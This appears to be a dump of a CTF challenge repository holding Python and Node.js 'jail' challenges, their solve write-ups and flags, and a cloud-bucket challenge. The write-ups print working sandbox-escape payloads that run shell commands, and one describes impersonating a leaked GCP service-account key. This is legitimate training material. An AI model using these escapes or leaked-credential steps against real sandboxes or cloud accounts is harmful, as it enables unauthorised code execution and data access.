are many ways to call a function without the use of a CallExpression. The below solution makes use of a NewExpression to create a new function that reads the flag file. Then, we use [tagged templates](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals#tagged_templates) to call the function. 4 | 5 | ```js 6 | new Function('let result=process.binding("spawn_sync").spawn({file:"cat",args:["cat","./flag"],stdio:[{type:"pipe",readable:true,writable:false},{type:"pipe",readable:false,writable:true},{type:"pipe",readable:false,writable:true},],});let output=result.output[1].toString();return output;')`` 7 | ``` 8 | -------------------------------------------------------------------------------- /Jail/babys_first_pyjail/README.md: -------------------------------------------------------------------------------- 1 | # Baby's First Pyjail 2 | 3 | @windex told me that jails should be sourceless. So no source for you. -------------------------------------------------------------------------------- /Jail/babys_first_pyjail/solve/writeup.md: -------------------------------------------------------------------------------- 1 | Many solutions. An easy one: 2 | 3 | ```py 4 | >>> breakpoint() 5 | --Return-- 6 | > (1)()->None 7 | (Pdb) import os; os.system('cat flag') 8 | uoftctf{you_got_out_of_jail_free} 9 | 0 10 | (Pdb) 11 | ``` -------------------------------------------------------------------------------- /Jail/babys_first_pyjail/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.13-slim-bullseye AS app 2 | 3 | RUN useradd -m ctfuser 4 | 5 | RUN chown root:root /home/ctfuser 6 | RUN chmod 755 /home/ctfuser 7 | 8 | 9 | WORKDIR /home/ctfuser/app 10 | 11 | COPY --chown=root:root chal.py . 12 | 13 | RUN echo "uoftctf{you_got_out_of_jail_free}" > /home/ctfuser/app/flag && \ 14 | 15 | chmod 444 /home/ctfuser/app/flag 16 | 17 | RUN chown -R root:root /home/ctfuser && \ 18 | 19 | chmod -R 555 /home/ctfuser/app 20 | 21 | FROM pwn.red/jail 22 | 23 | COPY --from=app / /srv 24 | 25 | COPY --chmod=555 ./run /srv/app/run 26 | 27 | ENV JAIL_PIDS=40 JAIL_MEM=15M JAIL_TIME=120 -------------------------------------------------------------------------------- /Jail/babys_first_pyjail/src/chal.py: -------------------------------------------------------------------------------- 1 | blacklist = ["import", "exec", "eval", "os","open","read","system","module","write", "."] 2 | 3 | while True: 4 | print(">>>", end=" ") 5 | try: 6 | cmd = input() 7 | for i in blacklist: 8 | if i in cmd: 9 | raise Exception("try harder") 10 | exec(cmd) 11 | except Exception as e: 12 | print(e) -------------------------------------------------------------------------------- /Jail/babys_first_pyjail/src/run: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | cd /home/ctfuser/app 3 | /usr/local/bin/python chal.py -------------------------------------------------------------------------------- /Jail/js_blacklist/README.md: -------------------------------------------------------------------------------- 1 | # JS Blacklist 2 | 3 | "use really_really_really_strict"; 4 | 5 | Can you escape my jail now? -------------------------------------------------------------------------------- /Jail/js_blacklist/chal/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:20-bullseye-slim AS app 2 | RUN useradd -m ctfuser 3 | RUN chown root:root /home/ctfuser 4 | RUN chmod 755 /home/ctfuser 5 | 6 | WORKDIR /home/ctfuser/app 7 | 8 | COPY --chown=root:root package.json . 9 | COPY --chown=root:root chal.js . 10 | 11 | RUN npm install 12 | 13 | RUN echo "uoftctf{op710n5_4r3_4lw4y5_4n_0p710n!!!}" > /home/ctfuser/app/flag && \ 14 | 15 | chmod 444 /home/ctfuser/app/flag 16 | 17 | RUN chmod -R 555 /home/ctfuser/ 18 | 19 | FROM pwn.red/jail 20 | 21 | COPY --from=app / /srv 22 | 23 | COPY --chmod=555 run /srv/app/run 24 | 25 | ENV JAIL_PIDS=40 JAIL_MEM=100M JAIL_TIME=120 -------------------------------------------------------------------------------- /Jail/js_blacklist/chal/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "js_jail", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "chal.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "keywords": [], 10 | "author": "SteakEnthusiast", 11 | "license": "ISC", 12 | "dependencies": { 13 | "@babel/generator": "^7.23.6", 14 | "@babel/parser": "^7.23.6", 15 | "@babel/traverse": "^7.23.6", 16 | "readline": "^1.3.0" 17 | }, 18 | "type": "module" 19 | } 20 | -------------------------------------------------------------------------------- /Jail/js_blacklist/chal/run: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | cd /home/ctfuser/app 3 | /usr/local/bin/node /home/ctfuser/app/chal.js -------------------------------------------------------------------------------- /Jail/js_blacklist/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{op710n5_4r3_4lw4y5_4n_0p710n!!!} -------------------------------------------------------------------------------- /Jail/js_evaluator/README.md: -------------------------------------------------------------------------------- 1 | # JS Evaluator 2 | 3 | Last year, I found a [critical security vulnerability in Babel](https://github.com/babel/babel/security/advisories/GHSA-67hx-6x53-jw92). I heard `path.evaluate()` is secure now, but it still wasn't useful enough for me. I added some code to enhance the functionality, without impacting the security! -------------------------------------------------------------------------------- /Jail/js_evaluator/chal/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:20-bullseye-slim AS app 2 | RUN useradd -m ctfuser 3 | RUN chown root:root /home/ctfuser 4 | RUN chmod 755 /home/ctfuser 5 | 6 | WORKDIR /home/ctfuser/app 7 | 8 | COPY --chown=root:root package.json . 9 | COPY --chown=root:root chal.js . 10 | COPY --chown=root:root evaluation_patched.js . 11 | 12 | RUN npm install 13 | 14 | RUN cp /home/ctfuser/app/evaluation_patched.js /home/ctfuser/app/node_modules/@babel/traverse/lib/path/evaluation.js 15 | 16 | RUN echo "uoftctf{c411b4ck_h311_0r_c411b4ck_h34v3n??}" > /home/ctfuser/app/flag && \ 17 | 18 | chmod 444 /home/ctfuser/app/flag 19 | 20 | RUN chmod -R 555 /home/ctfuser/ 21 | 22 | FROM pwn.red/jail 23 | 24 | COPY --from=app / /srv 25 | 26 | COPY --chmod=555 run /srv/app/run 27 | 28 | ENV JAIL_PIDS=40 JAIL_MEM=100M JAIL_TIME=120 -------------------------------------------------------------------------------- /Jail/js_evaluator/chal/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "js_jail", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "chal.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "keywords": [], 10 | "author": "SteakEnthusiast", 11 | "license": "ISC", 12 | "dependencies": { 13 | "@babel/generator": "^7.23.6", 14 | "@babel/parser": "^7.23.6", 15 | "@babel/traverse": "^7.23.6", 16 | "readline": "^1.3.0" 17 | }, 18 | "type": "module" 19 | } 20 | -------------------------------------------------------------------------------- /Jail/js_evaluator/chal/run: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | cd /home/ctfuser/app 3 | /usr/local/bin/node /home/ctfuser/app/chal.js -------------------------------------------------------------------------------- /Jail/js_evaluator/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{c411b4ck_h311_0r_c411b4ck_h34v3n??} -------------------------------------------------------------------------------- /Jail/zero/README.md: -------------------------------------------------------------------------------- 1 | # Zero 2 | 3 | Zero letters, zero numbers, zero underscores, zero builtins, and zero hope of escaping. -------------------------------------------------------------------------------- /Jail/zero/chal/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10.13-slim-bullseye AS app 2 | 3 | RUN useradd -m ctfuser 4 | 5 | RUN chown root:root /home/ctfuser 6 | RUN chmod 755 /home/ctfuser 7 | 8 | 9 | WORKDIR /home/ctfuser/app 10 | 11 | COPY --chown=root:root chal.py . 12 | 13 | RUN echo "uoftctf{zero_security_too_apparently_lmao}" > /home/ctfuser/app/flag && \ 14 | 15 | chmod 444 /home/ctfuser/app/flag 16 | 17 | RUN chown -R root:root /home/ctfuser && \ 18 | 19 | chmod -R 555 /home/ctfuser/app 20 | 21 | FROM pwn.red/jail 22 | 23 | COPY --from=app / /srv 24 | 25 | COPY --chmod=555 ./run /srv/app/run 26 | 27 | ENV JAIL_PIDS=40 JAIL_MEM=15M JAIL_TIME=120 -------------------------------------------------------------------------------- /Jail/zero/chal/chal.py: -------------------------------------------------------------------------------- 1 | def check(code): 2 | # no letters 3 | alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" 4 | # no numbers 5 | numbers = "0123456789" 6 | # no underscores 7 | underscore = "__" 8 | 9 | return not any((c in alphabet) or (c in numbers) or (underscore in code) for c in code) 10 | 11 | def safe_eval(code): 12 | if (check(code)): 13 | g = {'__builtins__': None} 14 | l = {'__builtins__': None} 15 | return print(eval(code, g, l )) # good luck! 16 | else: 17 | print("lol no") 18 | 19 | code = input(">>> ") 20 | safe_eval(code) -------------------------------------------------------------------------------- /Jail/zero/chal/run: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | cd /home/ctfuser/app 3 | /usr/local/bin/python chal.py -------------------------------------------------------------------------------- /Jail/zero/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{zero_security_too_apparently_lmao} -------------------------------------------------------------------------------- /Jail/zero/solve/writeup.md: -------------------------------------------------------------------------------- 1 | ().__𝘤𝘭𝘢𝘴𝘴__.__𝘣𝘢𝘴𝘦𝘴__[(''=='')-(''=='')].__𝘴𝘶𝘣𝘤𝘭𝘢𝘴𝘴𝘦𝘴__()[((''=='')+(''=='')+(''=='')+(''=='')+(''==''))**((''=='')+(''=='')+(''==''))-((''=='')+(''=='')+(''=='')+(''=='')+(''=='')+(''=='')+(''==''))].𝘨𝘦𝘵_𝘥𝘢𝘵𝘢(".",().__𝘥𝘰𝘤__[((''=='')+(''==''))**((''=='')+(''=='')+(''=='')+(''=='')+(''==''))-(''=='')] + ().__𝘥𝘰𝘤__[(''=='')+(''=='')+(''=='')] + [].__𝘥𝘰𝘤__[((''=='')+(''=='')+(''=='')+(''==''))*((''=='')+(''=='')+(''==''))] + [].__𝘥𝘰𝘤__[(((''=='')+(''=='')+(''=='')+(''==''))<<((''=='')+(''=='')+(''=='')))+((''=='')+(''=='')+(''=='')+(''==''))]) -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/solve/solve.md: -------------------------------------------------------------------------------- 1 | In Out of the Bucket we identify a JSON (funny.json) which is a service account key. We can impersonate using the following command: 2 | ``` 3 | gcloud auth activate-service-account --key-file=funny.jso 4 | ``` 5 | Then we can list the buckets (as hinted in the title): 6 | ``` 7 | gsutil ls 8 | ``` 9 | We find another bucket named flag-images. We can list the contents of the bucket: 10 | ``` 11 | gsutil ls gs://flag-images 12 | ``` 13 | The rest of the challenge involves hunting down the image that contains the flag. The flag is in xa.png. 14 | -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ad.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ae.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ae.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/af.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/af.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ag.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ai.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ai.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/al.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/al.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/am.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/am.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ao.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ao.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/aq.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/aq.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ar.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ar.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/as.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/as.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/at.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/at.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/au.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/au.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/aw.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/aw.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ax.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ax.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/az.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/az.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ba.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ba.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bb.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bd.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/be.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/be.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bf.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bg.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bh.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bi.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bi.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bj.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bj.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bl.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bl.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bm.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bn.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bo.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bq.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bq.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/br.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/br.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bs.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bt.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bv.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bv.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bw.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bw.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/by.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/by.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/bz.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/bz.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ca.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ca.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cc.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cd.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cf.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cg.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ch.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ci.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ci.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ck.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ck.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cl.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cl.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cm.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cn.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/co.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/co.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cr.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cu.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cv.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cv.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cw.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cw.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cx.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cx.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cy.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/cz.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/cz.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/de.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/de.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/dj.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/dj.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/dk.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/dk.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/dm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/dm.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/do.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/do.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/dz.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/dz.png -------------------------------------------------------------------------------- /Miscellaneous/Out of the Bucket 2/src/256x192/ec.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Miscellaneous/Out of the Bucket 2/src/256x192/ec.png -------------------------------------------------------------------------------- 